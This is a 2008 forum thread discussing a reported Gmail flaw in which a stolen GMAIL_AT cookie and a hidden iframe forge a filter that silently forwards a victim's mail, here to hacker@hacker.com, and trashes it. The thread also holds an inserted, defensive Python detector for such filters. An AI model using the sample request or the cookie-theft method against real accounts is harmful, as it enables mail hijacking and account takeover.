xisto Community
shotgun

Gmail Security Flaw


When you create a filter in your Gmail account, a request is sent to Google's servers to be processed. The request is made in the form of a url with many variables. For security reasons, your browser doesn't display all the variables contained within the url. Using Firefox and a plugin called Live HTTP Headers, you can see exactly what variables are sent from your browser to Google's servers.
Here is an example of a request url sent to Google to create a filter exactly like the one in the image above. I've broken down the url by variable so it's easier to read:

https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1&ltmpl=googlemail&emr=1
?ui=2
&ik=ad7df7dc23 *Unique Account Identifier*
&at=xn3j35svndkg48yp2qgmpt99ivcqdc *Session Authorization Key*
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true

Through a process of elimination you can determine the role of each variable. The two most important variables are ik & at. The ik variable is the equivalent of a username; each account has one and it never changes. Obtaining this variable is tricky but possible. I'm not going to tell you how to do it; if you search hard enough online you'll find out how.

Obtaining the at variable on the other hand can be done by tricking a user into visiting a page that contains malicious code that subsequently steals a cookie from the user called GMAIL_AT which is the same as the at variable, just named differently. Once the cookie is stolen the malicious code creates a hidden iframe with a url containing the variables that authorize Gmail to create a filter for your account.

Cnet News

-------------
OS:Windows Vista Ultimate Sp1
MD:Asus P5N-E
CPU:2.40GHz/Intel Quad Core Q6600
RAM:Corsair Dual Channel 4GB 800Mhz
VC:XFX GeForce 9800 GTX/512MB
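
An added detection example (not part of the original post or of the article it copies): it parses captured request URLs and flags filter-creation requests that forward mail to an address outside an allow-list. The parameter meanings, the `TRUSTED_FORWARD_DOMAINS` allow-list and the sample URLs are assumptions constructed from the variables listed in the post, and it presumes the request URLs are visible to the defender (for example through a TLS-inspecting proxy).

```python
from urllib.parse import urlsplit, parse_qs

# Assumed meanings, inferred from the parameter names in the post above:
# act=cf creates a filter, cf1_from is the sender match, cf2_emc/cf2_email
# turn on forwarding to an address, cf2_tr sends the matched mail to trash.
TRUSTED_FORWARD_DOMAINS = {"example.org"}  # hypothetical allow-list

def parse_filter_request(url):
    """Return the filter-creation fields of a request URL, or None."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)

    def first(name):
        return params.get(name, [""])[0]

    if first("act") != "cf":
        return None  # not a filter-creation request
    return {
        "match_from": first("cf1_from"),
        "forward_to": first("cf2_email") if first("cf2_emc") == "true" else "",
        "trash": first("cf2_tr") == "true",
    }

def assess(url):
    """Return a list of findings for one captured request URL."""
    rule = parse_filter_request(url)
    if rule is None or not rule["forward_to"]:
        return []
    findings = []
    domain = rule["forward_to"].rpartition("@")[2].lower()
    if domain not in TRUSTED_FORWARD_DOMAINS:
        sender = rule["match_from"] or "any sender"
        findings.append(f"forwards mail from {sender} to {rule['forward_to']}")
        if rule["trash"]:
            findings.append("forwarded mail is also trashed, hiding it from the owner")
    return findings

# Constructed sample capture; the ik/at values are placeholders, not real tokens.
BASE = "https://mail.google.com/mail/?ui=2&ik=IK_PLACEHOLDER&at=AT_PLACEHOLDER"
SAMPLE_URLS = [
    BASE + "&view=up&act=cf&rt=h&search=cf&cf1_from=support%40godaddy.com"
           "&cf2_emc=true&cf2_email=hacker%40hacker.com&cf2_tr=true",
    BASE + "&view=up&act=cf&cf1_from=news%40example.org&cf2_tr=true",
    "https://mail.google.com/mail/?ui=2&view=tl&search=inbox",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        for finding in assess(url):
            print(finding)
```

The same check applies to reviewing an account's existing filters: any rule that forwards to an unfamiliar address, especially one that also deletes the message, deserves a closer look.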



This article has already been published by Brandon on Sunday, November 23rd, 2008,
here: http://www.geekcondition.com/
The geekcondition post goes further than your text, explaining what to do in order to work around this security hole, as well as honestly giving the official Google answer, which is, guess what?

We've seen some speculation recently about a purported security vulnerability in Gmail and the theft of several website owners' domains by unauthorized third parties. At Google we're committed to providing secure products, and we mounted an immediate investigation. Our results indicate no evidence of a Gmail vulnerability….

@shotgun: please read our forum rules again. Here, at Xisto, we prefer original articles. It is not forbidden to post copied text; however, you must put the copied text between quotes and mention where you copied the text from.
I did this quoting job for you today, I would like you to do the quoting job by yourself next time.
Else, we could imagine that you are trying to cheat with our Credit System. And this makes the admins around here rather angry. :rolleyes:


So does this mean that an attacker could gain unauthorized access to your account or what exactly is the problem with this security hole? Is it preventable or is Google currently investigating a patch right now?


So does this mean that an attacker could gain unauthorized access to your account or what exactly is the problem with this security hole? Is it preventable or is Google currently investigating a patch right now?

If you read the original post, you will see that Google has solved the problem and claims that there is no real security hole.
